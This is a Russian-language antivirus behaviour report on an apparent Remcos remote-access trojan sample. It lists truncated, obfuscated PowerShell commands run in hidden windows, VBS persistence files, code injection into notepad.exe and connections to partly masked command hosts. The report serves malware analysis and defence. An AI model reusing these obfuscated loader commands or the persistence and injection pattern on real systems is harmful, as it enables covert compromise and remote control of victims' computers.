Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gh47gh7='92!72!37!26!67!E2!46!16!07!56!47!F6!E6!C5!72!02!B2!14!45!14!44!05!05!14!A3!67!E6!56!42!82!37!37!56!36!F6!27!07!D2!47!27!16!47!37!02!B3!85!06!54!06!94!C7!72!92!72!72!37!26!67!E2!46!16!...
Внедряет код в
следующие системные процессы:
- %WINDIR%\syswow64\notepad.exe
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\notepad.vbs
- %LOCALAPPDATA%\notepad.vbs
- %APPDATA%\remcos\logs.dat
Сетевая активность
Подключается к
- 'fu###ubusa.com':80
- 'is######cker.duckdns.org':672
TCP
- 'is######cker.duckdns.org':672
UDP
- DNS ASK fu###ubusa.com
- DNS ASK is######cker.duckdns.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\notepad.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $gh47gh7='92!72!37!26!67!E2!46!16!07!56!47!F6!E6!C5!72!02!B2!14!45!14!44!05!05!14!A3!67!E6!56!42!82!37!37!56!36!F6!27!07!D2!47!27!16!47!37!02!B3!85!06!54!06!94!C7!72!92!72!72!37!26!67!E2!46!16!...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ;$WddikQlVyoFPSzkemtYh='P4*PF*20*7B*24*70*P9*PE*P7*20*3D*20*74*PW*73*74*2D*P3*PF*PE*PE*PW*P3*74*P9*PF*PE*20*2D*P3*PF*PD*70*20*P7*PF*PF*P7*PC*PW*2E*P3*PF*PD*20*2D*P3*PF*7W*PE*74*20*31*20*2D*W1*7...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\notepad.vbs" "%LOCALAPPDATA%" /Y' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ;$WddikQlVyoFPSzkemtYh='P4*PF*20*7B*24*70*P9*PE*P7*20*3D*20*74*PW*73*74*2D*P3*PF*PE*PE*PW*P3*74*P9*PF*PE*20*2D*P3*PF*PD*70*20*P7*PF*PF*P7*PC*PW*2E*P3*PF*PD*20*2D*P3*PF*7W*PE*74*20*31*20*2D*W1*7...
- '<SYSTEM32>\cmd.exe' /c copy "%APPDATA%\notepad.vbs" "%LOCALAPPDATA%" /Y
- '%WINDIR%\syswow64\notepad.exe'
